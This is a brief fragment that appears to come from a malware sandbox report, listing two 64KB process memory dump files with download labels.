Filesize
64KB

Download
memory/6132-702-0x00000286C27F0000-0x00000286C2800000-memory.dmp

Filesize
64KB

Download
memory/6132-705-0x00000286C27F0000-0x00000286C2800000-memory.dmp

Filesize
64KB

Download